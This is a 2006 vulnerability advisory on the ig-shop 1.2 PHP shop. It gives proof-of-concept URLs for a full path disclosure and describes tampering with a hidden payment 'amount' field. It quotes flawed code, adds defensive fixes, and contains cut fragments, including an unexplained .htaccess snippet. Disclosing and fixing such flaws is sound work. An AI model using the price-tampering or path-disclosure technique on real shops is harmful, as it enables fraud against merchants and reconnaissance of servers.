LaGiPusHinGWitH ---- IT
Author: roninmorgue
Date: April, 29th 2006
Location: Indonesia, Jakarta
Web: http://www.forum.mercubuana-it.org/
--------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ig-shop is an advanced, free e-commerce application written in PHP.
Download : http://prdownloads.sourceforge.net/ig-s ... p?download
Online support info@igeneric.co.uk
Website http://www.igeneric.co.uk
Version:
Tested on version 1.2.
Not tested on older or newer versions.
-------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Full Path Disclosure:
PoC:
http://jouninhackers/ig-shop/ig_shop/pa ... oduct_id=1
by removing the product index number:
http://jouninhackers/ig-shop/ig_shop/pa ... roduct_id=
Warning: Cannot add header information - headers already sent by (output started at
c:\apache\htdocs\ig-shop\ig_shop\class.FastTemplate.php:349) in c:\apache\htdocs\
ig-shop\ig_shop\product.php on line 211
An error message appears on the page, and it includes the full path from the
server root to the site's directory.
The vulnerability is in the function module_product_view_show($module_id,$param)
in product.php:
function module_product_view_show($module_id,$param) {
    global $tpl,$product_id,$view_image,$type_id,$session,$HTTP_COOKIE_VARS;
    if (!$product_id) {
        sleep(2);
        // output has already been sent by FastTemplate, so this header() call fails
        header("Location: index.php");
    }
    // ... (rest of the function not shown)
}
together with the FastTemplate class in class.FastTemplate.php.
In module_product_view_show($module_id,$param), when the product index is missing
the request is redirected to index.php, but the FastTemplate class has already
output the selected product page, so header() can no longer send the redirect and
the error handling fails.
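One way to close the path disclosure, as an added example that is not ig-shop code: validate product_id and send the redirect before anything is printed, stop with exit, and keep PHP errors out of the response. The function names parse_product_id() and redirect_target() are hypothetical.

```php
<?php
// Added example, not ig-shop code; the function names are hypothetical.

// Log errors instead of printing them (and the server paths they contain).
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/** Return product_id as a positive integer, or null if missing, empty or non-numeric. */
function parse_product_id(array $query): ?int
{
    $raw = $query['product_id'] ?? '';
    if (!is_string($raw) || !ctype_digit($raw)) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

/** Redirect target chosen before any output, or null when the page may render. */
function redirect_target(array $query): ?string
{
    return parse_product_id($query) === null ? 'index.php' : null;
}

if (PHP_SAPI === 'cli') {
    // Constructed sample queries: valid id, empty id, parameter absent.
    foreach ([['product_id' => '1'], ['product_id' => ''], []] as $q) {
        var_dump(redirect_target($q));
    }
} else {
    // Web request: this runs before the template engine prints anything.
    $target = redirect_target($_GET);
    if ($target !== null) {
        header('Location: ' . $target, true, 302);
        exit; // without exit the product page would still be rendered
    }
    // ... safe to parse and print the product template from here on
}
```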
B. Hidden field vulnerability
At checkout, price validation is in fact performed by the server:
view_chart.php
if ($pids) {
    $result = mysql_query("select p.*,mf.name as manuf_name,t.name as type_name from catalog_product
        as p left join catalog_manuf as mf on p.manuf_id = mf.manuf_id left
        join catalog_type as t on p.type_id = t.type_id
        where p.product_id in ($pids) group by p.product_id order by mf.name,p.model");
    if ($result && mysql_num_rows($result)) {
        $tpl->parse("HTML","head");
        $tpl->FastPrint("HTML");
        $total = 0;
        while ($l = mysql_fetch_array($result)) {
            // the method name was masked by a word filter in the source;
            // FastTemplate's assign() is assumed here
            $tpl->assign(array("PRODUCT_ID" => "$l[product_id]",
                "MODEL" => strip_tags($l[model]),
                "CODE" => "$l",
                "TYPE" => strip_tags($l[type_name]),
                "PRICE" => sprintf("%.2f",$l[price]),
                "MANUF" => "$l[manuf_name]"));
===================cut============================
so the user cannot change data or values by modifying the code on the client side,
using the technique of downloading the page as HTML.
However, at the payment gateway level (cart.php) there is this script:
if ($new_order)
$grandtotal = "$total+$shipping";
$pmisi = "
Igeneric Order Confirmation
==================================
Order ID: $session[order_id]
SubTotal: $total
Shipping: $shipping
Total: $grandtotal
====================================
Billing Information
====================================
Salutation: $data[salutation]
First Name: $data[first
==========================cut=================
which, when the client downloads the page as HTML, produces the following markup:
<form name="cart" action="https://www.secpay.com/java-bin/ValCard" method="post">
<input type="hidden" name="merchant" value="mikenu01">
<input type="hidden" name="trans_id" value="13">
<input type="hidden" name="callback" value="#">
==========================cut=================
<input type="hidden" name="amount" value="5100005.00">
<input type="hidden" name="order"
value="<order class='com.secpay.seccard.Order'>
<orderLines class='com.secpay.seccard.OrderLine'>
<OrderLine>
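The hidden amount field in the form above is under the client's control, so the shop has to compare what the gateway reports against the total it computed itself. A sketch of that check, as an added example that is not ig-shop or SECPay code: the $orders store and the function names are hypothetical, only the field names trans_id and amount come from the form, and the callback is assumed to be authenticated by the gateway's own mechanism.

```php
<?php
// Added example, not ig-shop or SECPay code. $orders and the function names are
// hypothetical; only the field names "trans_id" and "amount" come from the form.

/** Convert a decimal string such as "5100005.00" to integer minor units. */
function to_minor_units(string $amount): ?int
{
    if (!preg_match('/^(\d{1,12})(?:\.(\d{1,2}))?$/', $amount, $m)) {
        return null; // reject signs, exponents, spaces and extra decimals
    }
    $fraction = str_pad($m[2] ?? '', 2, '0'); // "5" becomes "50", "" becomes "00"
    return (int) $m[1] * 100 + (int) $fraction;
}

/**
 * Accept a payment only when the amount reported for trans_id equals the total
 * the server computed from its own catalogue prices at checkout.
 */
function payment_matches_order(array $orders, array $callback): bool
{
    $transId = $callback['trans_id'] ?? null;
    $amount  = $callback['amount'] ?? null;
    if (!is_string($transId) || !is_string($amount) || !isset($orders[$transId])) {
        return false;
    }
    $reported = to_minor_units($amount);
    return $reported !== null && $orders[$transId]['total_minor'] === $reported;
}

if (PHP_SAPI === 'cli') {
    // Constructed data: order 13 was totalled server-side at 5100005.00.
    $orders = ['13' => ['total_minor' => 510000500]];
    $samples = [
        ['trans_id' => '13', 'amount' => '5100005.00'], // untouched form
        ['trans_id' => '13', 'amount' => '1.00'],       // edited hidden field
        ['trans_id' => '99', 'amount' => '5100005.00'], // unknown order
    ];
    foreach ($samples as $cb) {
        var_dump(payment_matches_order($orders, $cb)); // true, false, false
    }
}
```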
require user roninmorgue
</Limit>
In the example above, accessing the directory requires the userid
"roninmorgue" and a password that matches the roninmorgue entry in the file
"/home/roninmorgue/.kuncirahasia". When the directory is accessed, a pop-up
window appears asking for the userid and password.
The password in the file "/home/roninmorgue/.kuncirahasia" can be created with
the "htpasswd" program.
unix% htpasswd -c /home/roninmorgue/.kuncirahasia roninmorgue
New password: ***********
----------------------------------------------------------
Shoutz:
~~~~~~~
~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion, WaferStick, newbie)
~ mercubuana-it@yahoogroups.com ,
----------------------------------------------------------
Contact:
~~~~~~~~
roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id